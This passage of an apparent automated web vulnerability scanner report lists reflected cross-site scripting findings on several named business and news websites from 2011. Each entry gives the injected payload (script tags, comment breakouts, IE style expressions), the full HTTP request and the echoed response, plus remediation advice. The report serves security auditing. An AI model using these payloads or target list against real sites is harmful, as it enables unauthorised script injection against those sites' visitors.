<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<form method="post" action="http://www.hartfordbusiness.com/news14300.html8d3ba"><script>alert(1)</script>22db1e31600#comments" class="fs_form fill" id="comment_form">
...[SNIP]...

5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 631ac--><script>alert(1)</script>0c466881b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico631ac--><script>alert(1)</script>0c466881b13 HTTP/1.1
Host: www.letipli.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDACRSARSQ=PKIPPPGAJLLHAGEDEMMHOPGO

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 13 May 2011 00:48:45 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Content-Length: 18000
Content-Type: text/html
Expires: Thu, 12 May 2011 00:48:44 GMT
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /favicon.ico631ac--><script>alert(1)</script>0c466881b13 -->
...[SNIP]...

5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e4b7--><script>alert(1)</script>76ff3e246a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 HTTP/1.1
Host: www.letipli.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:26 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Connection: close
Content-Length: 16792
Content-Type: text/html
Expires: Wed, 11 May 2011 17:02:26 GMT
Set-Cookie: ASPSESSIONIDACRSARSQ=NDIOPPGAEEJNPIBMFJKNCIBF; path=/
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 -->
...[SNIP]...

5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820c9'%3b341cec042cb was submitted in the REST URL parameter 1. This input was echoed as 820c9';341cec042cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news820c9'%3b341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp03
Date: Thu, 12 May 2011 16:55:36 GMT
Content-Length: 47979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news820c9';341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf15'%3b1be7beea177 was submitted in the REST URL parameter 2. This input was echoed as 4bf15';1be7beea177 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story4bf15'%3b1be7beea177/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp05
Date: Thu, 12 May 2011 16:55:38 GMT
Content-Length: 47962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story4bf15';1be7beea177/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27255'%3b1bfa3236508 was submitted in the REST URL parameter 3. This input was echoed as 27255';1bfa3236508 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story/therese-polettis-tech-tales-ebay27255'%3b1bfa3236508/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-MACHINE: sbkdfpswebp05
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:39 GMT
Content-Length: 47989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story/therese-polettis-tech-tales-ebay27255';1bfa3236508/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c236--><script>alert(1)</script>ec7143486da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uzkyef2x3acjgpfcgsg5xca2; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
intImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into an HTML comment. The payload db0cb-->fb4f1fe73a0 was submitted in the searchlink parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43785


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
ouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba was submitted in the searchlink parameter. This input was echoed as fb9d9"style="x:expr/**/ession(alert(1))"514872699ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<IFRAME style=" bgcolor:#969696;height:530px;width:450px;margin-top:4px;overflow-x: hidden;z-index:1;left:0px" src="fb9d9"style="x:expr/**/ession(alert(1))"514872699ba.aspx" frameborder=0 name="overview" style="FILTER: chroma (color=00FF80)">
...[SNIP]...

5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 was submitted in the searchlink parameter. This input was echoed as 59747"style="x:expr/**/ession(alert(1))"9b4792d76c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=searchnew59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
t" id="printImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('searchnew59747"style="x:expr/**/ession(alert(1))"9b4792d76c9.aspx?PrintPage=True&mode=&sortby=','PrintPage','scrollbars=yes,menubar=yes,width=700,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...

5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /about/honors_awards.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81f7"><script>alert(1)</script>4d4e89dfd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1 HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:15 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24237


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Honors & Awards</TITLE>
   </HEAD>
   <meta name="description" content=" Neal, Gerber & Eisenberg LLP is committed to excellence in both client
...[SNIP]...
<a href="http://www.ngelaw.com/about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1&print=true" target=_blank>
...[SNIP]...

5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/attorney.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc93"><script>alert(1)</script>9db17f76a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/event_detail.aspx?ID=688
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:25 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18042


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys
            | Search
       </TITLE>
   </HEAD>
   
   <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="java
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1&print=true" target=_blank>
...[SNIP]...

5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/bio.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7e8"><script>alert(1)</script>6f7768e8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/results.aspx?letter=M
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:56:04 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11687


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys | Hillary A. Mann</TITLE>
   </HEAD>
   <meta name="description" content="Hillary A. Mann Hillary A. Mann is a member of Neal Gerber
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1&print=true" target=_blank>
...[SNIP]...

5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/results.aspx

Issue detail

The value of the letter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 was submitted in the letter parameter. This input was echoed as 373ca"style="x:expr/**/ession(alert(1))"25abb64fc21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /attorney/results.aspx?letter=M373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/attorney.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:55 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9896


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Attorneys | Attorney Search Results</title>
       
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="jav
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/results.aspx?letter=M373ca"style="x:expr/**/ession(alert(1))"25abb64fc21&print=true" target=_blank>
...[SNIP]...

5.32. http://www.ngelaw.com/att